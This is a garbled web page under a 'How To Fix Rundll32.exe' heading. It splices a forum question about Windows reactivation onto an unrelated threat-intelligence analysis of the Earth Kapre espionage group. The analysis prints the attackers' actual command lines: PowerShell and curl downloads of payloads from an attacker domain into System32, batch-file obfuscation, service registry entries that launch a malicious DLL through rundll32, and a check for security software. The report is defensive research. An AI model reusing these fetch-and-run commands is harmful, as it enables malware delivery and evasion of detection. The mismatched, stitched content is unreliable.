How To Fix C Windows System32 Rundll32.exe
Alfonzo Liebenstein
Now when I start windows from the new disk I get:Since windows was first activated on this computer, the hardware on the computer has changed significantly. Due to these changes, window must be reactivated within 3 days.Do you want reactivate windows now?
Most pointers in the inet say that you can activate over the phone,which I would gladly do (I even my product ID) but for this to work you have to be logged in.in my case regardless of how I reply to this message It just logs me out.
I also found several references that said that running rundll32.exe syssetup,SetupOobeBnk would reset the activation and allow me to login so I could complete the over the phone activation, but I am guessing this would work on the running OS.
I was wandering if there is a way to cause rundll32.exe syssetup,SetupOobeBnk to run on a windows installation that is not the currently running one but is on a disk connected to a machine running windows ? i.e. can I use another computer that has the OS to force the OS on some hard drive into 30 days trial before activition ?
The espionage group Earth Kapre (aka RedCurl and Red Wolf) has been actively conducting phishing campaigns targeting organizations in Russia, Germany, Ukraine, the United Kingdom, Slovenia, Canada, Australia, and the US. It uses phishing emails that contain malicious attachments (.iso and .img), which lead to successful infections upon opening. This triggers the creation of a scheduled task for persistence, alongside the unauthorized collection and transmission of sensitive data to command-and-control (C&C) servers.
The Trend Micro Managed Extended Detection and Response (MDR) and Incident Response (IR) team conducted an investigation of an incident where numerous machines were infected by the Earth Kapre downloader. This piece of malware was observed establishing connections with its C&C servers, suggesting a potential data theft scenario. Interestingly, in this instance, Earth Kapre has returned to using a previously known technique that is distinct from its more recent campaigns: It used legitimate tools Powershell.exe and curl.exe to procure the subsequent stage downloader. In an attempt to blend into the network and evade detection, Earth Kapre was found to have used the Program Compatibility Assistant (pcalua.exe) to execute malicious command lines.
This blog entry will examine Trend Micro MDR team's investigation that successfully uncovered the intrusion sets employed by Earth Kapre in a recent incident, as well as how the team leveraged threat intelligence to attribute the extracted evidence to the cyberespionage threat group.
The Trend Micro MDR threat hunting team initially detected the creation of a suspicious file in C:\Windows\System32\ms.dll (detected by Trend Micro as Trojan.Win64.CRUDLER.A). Further investigation revealed the use of curl.exe to download the file from the following URLs:
We observed that the initial command employs PowerShell to download a file (curl.tmp) from the URL [.]melaniebest[.]com/ms/curl.tmp and saves it as curl.exe in the C:\Windows\System32\ directory. For the benefit of this analysis, we will use this domain, but the same analysis should hold for the other domains in the previously mentioned list of URLs. Curl.exe is a command-line tool and library designed for efficient data transfer with URLs. While it is a legitimate tool, it can also be abused by threat actors for malicious purposes.
%COMSPEC% /Q /c echo powershell -c "iwr -Uri [.]melaniebest[.]com/ms/curl.tmp -OutFile C:\Windows\System32\curl.exe -UseBasicParsing" ^> \\127.0.0.1\C$\dvPqyh 2^>^&1 > %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c %TEMP%\KzIMnc.bat & %COMSPEC% /Q /c del %TEMP%\KzIMnc.bat
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\7za.exe [.]melaniebest[.]com/ms/7za.tmp ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\IAqJUm.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\IAqJUm.bat
The Earth Kapre loader was then downloaded using curl.exe from the same domain, [.]melaniebest[.]com/ms/ms.tmp, and was saved as ms.dll (though it should be noted that in some machines, the file name used was ps.dll) in the C:\Windows\System32\ directory. The threat actors used echo (as also seen in previous commands) and outputted it into a batch file, which is a commonly employed obfuscation technique. By echoing the command into a batch file, they could dynamically generate and execute commands, making it harder to analyze or detect malicious activities. The use of temporary batch files also allows for task automation and easier security monitoring evasion. We observed that the threat actors deleted the batch file afterward to cover their tracks.
C:\Windows\system32\cmd.exe /Q /c echo curl -o C:\Windows\System32\ms.dll [.]melaniebest.com/ms/ms.tmp ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\DFMPAa.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\DFMPAa.bat
C:\Windows\system32\cmd.exe /Q /c echo 7za.exe x -aoa -p123 C:\Windows\Temp\ms.tmp -o C:\Windows\Temp\ ^> \\127.0.0.1\C$\lgNMiK 2^>^&1 > C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\BuWmUA.bat & C:\Windows\system32\cmd.exe /Q /c del C:\Windows\TEMP\BuWmUA
The Python script was crafted to establish outbound communication and execute remote commands using Server Message Block (SMB) via port 445. During the execution of the script named client.py, an external IP address, 198[.]252[.]101[.]86, is passed as a command-line argument, suggesting its potential role as a C&C server.
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\aQpzRMnIku
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo rundll32.exe C:\Windows\system32\ms.dll,ms ^> \\127.0.0.1\C$\NoajCy 2^>^&1 > %TEMP%\YdEcul.bat & %COMSPEC% /Q /c %TEMP%\YdEcul.bat & %COMSPEC% /Q /c del %TEMP%\YdEcul.bat
Registry value type: 2
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\kPbzlGKCyO
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\ms.dll ^> \\127.0.0.1\C$\tZpOKq 2^>^&1 > %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c %TEMP%\DFMPAa.bat & %COMSPEC% /Q /c del %TEMP%\DFMPAa.bat
Registry value type: 2
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\lzZqdAEwKP
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo curl -o C:\Windows\System32\7za.exe ^> \\127.0.0.1\C$\xWJhao 2^>^&1 > %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c %TEMP%\IAqJUm.bat & %COMSPEC% /Q /c del %TEMP%\IAqJUm.bat
Registry value type: 2
We identified a command that appears to use netstat to check for an open port 4119. The purpose of this command might involve gathering network connection information linked to the specified port or checking for a specific pattern in the netstat output. Port 4119 serves as the Trend Micro Deep Security Manager GUI and API port, suggesting that the threat actor could be verifying the presence of the security program on this machine.
Registry root: 3
Registry key: HKLM\SYSTEM\CurrentControlSet\Services\zOMISPlXbL
Registry value name: imagepath
Registry value data: %COMSPEC% /Q /c echo netstat -an find "4119" ^> \\127.0.0.1\C$\SspgqD 2^>^&1 > %TEMP%\MjHubF.bat & %COMSPEC% /Q /c %TEMP%\MjHubF.bat & %COMSPEC% /Q /c del %TEMP%\MjHubF.bat
Registry value type: 2
The Program Compatibility Assistant Service (pcalua.exe) is a Windows service designed to identify and address compatibility issues with older programs. Adversaries can exploit this utility to enable command execution and bypass security restrictions by using it as an alternative command-line interpreter. In this investigation, the threat actor uses this tool to obscure their activities.
The Earth Kapre downloader has been distributed across various locations under randomly generated or obfuscated file names. The following are some enumerated examples that we discovered in our investigation:
In the following screenshot example, the file gkcb92eb2f8982d93a.exe, which was spawned by pcalua.exe, is observed establishing a connection to preston[.]melaniebest[.]com, the same domain discussed in the previous section.
By analyzing the acquired Earth Kapre downloader sample file, we have confirmed that the InternetOpenA and InternetConnectA API functions were used. These functions facilitate HTTP requests and verify the presence of a network connection.
Scheduled tasks were installed for persistence, as illustrated in Figure 7, where various tasks commenced before the Earth Kapre downloader file was executed. Figure 7 further reveals the execution of the suspicious task CacheTask ef07b190e6e6d160 just before the Earth Kapre downloader was executed.
The task names, file names, and file locations differ in each machine. Figure 8 displays evidence of malicious scheduled tasks that execute: C:\Users\\AppData\Local\Sysmain\oxdece5f42fddfbde1.exe on an hourly basis.
The created task name varies per machine, but it incorporates a segment of the associated Earth Kapre downloader file name. For instance, if the file name is ef07b190e6e6d160.exe, the scheduled task will be named CacheTask ef07b190e6e6d160. Table 1 displays examples of task names created across the infected machines in the network.
Given that the identified patient-zero machines lacked Trend Micro XDR installation, we had limited visibility when tracing the point of entry for the attack. To address this gap, we attempted to complete the chain by identifying a similar infrastructure observed in the incident. Utilizing the IP address 23[.]254[.]224[.]79 from our investigation, we systematically pivoted across various data points through cyberthreat intelligence and deduced that the initial access was delivered via a phishing email carrying a malicious attachment. The Earth Kapre samples found in the wild, including the one used in this attack, share the same infrastructure and are often delivered through malicious ISO or IMG files received via email.
7fc3f7cf58